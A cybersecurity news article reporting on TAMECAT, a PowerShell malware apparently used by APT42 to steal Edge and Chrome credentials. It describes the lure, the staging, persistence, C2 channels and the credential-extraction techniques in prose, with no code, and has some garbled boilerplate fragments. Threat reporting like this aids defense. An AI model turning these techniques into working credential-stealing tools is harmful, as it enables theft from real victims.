TAMECAT, a sophisticated PowerShell-based malware that targets login credentials kept in Microsoft Edge and Chrome browsers, has become a serious threat to enterprise security This article explores malware espionage. . The Iranian state-sponsored cyber-espionage group APT42, which has been actively targeting high-value senior defense and government officials worldwide, uses this malware as part of their espionage campaigns.

Discover more Subscription to cybersecurity news Malware that has been exploited The threat demonstrates advanced capabilities in credential theft, data exfiltration, and persistent access to compromised systems. Social engineering techniques are the first step in TAMECAT's multi-stage infection process. The attackers send victims malicious links that exploit the search-ms URI protocol handler while posing as reliable WhatsApp contacts.

After being activated, the malware downloads a VBScript that determines the proper execution path by performing antivirus detection on the target system. Details Of TAMECAT’s capabilities (Source – Pulsedive) The malware can modify its deployment strategy in response to the security environment it comes across thanks to this preliminary reconnaissance. The Pulsedive Danger Researchers found that TAMECAT uses a variety of command-and-control channels, such as Firebase, Discord, Telegram bots, and Cloudflare Workers infrastructure.

Because of its modular design, the malware can download more PowerShell scripts and run different commands from a distance. It is a complete surveillance tool because each module has a distinct function, from screen capture and file system crawling to browser credential extraction. WebDAV servers are used by the threat actors responsible for TAMECAT to distribute malicious LNK files that pose as PDF documents.

TAMECAT was downloaded using VBScript (Source: Pulsedive). These files initiate a series of actions that create persistence via registry run keys and logon scripts when they are executed. The malware uses encrypted channels to communicate with its command-and-control infrastructure, protecting stolen data in transit by using AES encryption with predefined keys.

Traditional security tools find it much more difficult to detect this layered approach to obfuscation. Browser Credential Extraction Mechanism TAMECAT uses advanced methods to retrieve login credentials from Chrome and Microsoft Edge browsers. The malware utilizes Microsoft Edge’s remote debugging feature to access browser data while the application is running. To obtain unrestricted access to stored credential databases for Chrome, TAMECAT momentarily suspends the browser process.

The Borjol function that was decoded (Source: Pulsedive) Regardless of the victim's preferred browser, the malware can extract sensitive authentication data thanks to this dual-capability strategy. The credential extraction module leaves very few forensic traces on the compromised system because it runs completely in memory. Code that is executed in response to the C2 server's response (Source: Pulsedive) After credentials are gathered, TAMECAT divides the stolen data into smaller chunks before exfiltrating it using its Download Module and a specialized DLL component called Runs.dll.

The malware is able to avoid detection by network monitoring tools by using this segmentation technique. In order to provide redundancy in the event that one communication path is blocked or monitored, the exfiltration process simultaneously uses multiple channels, such as FTP and HTTPS protocols.

, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.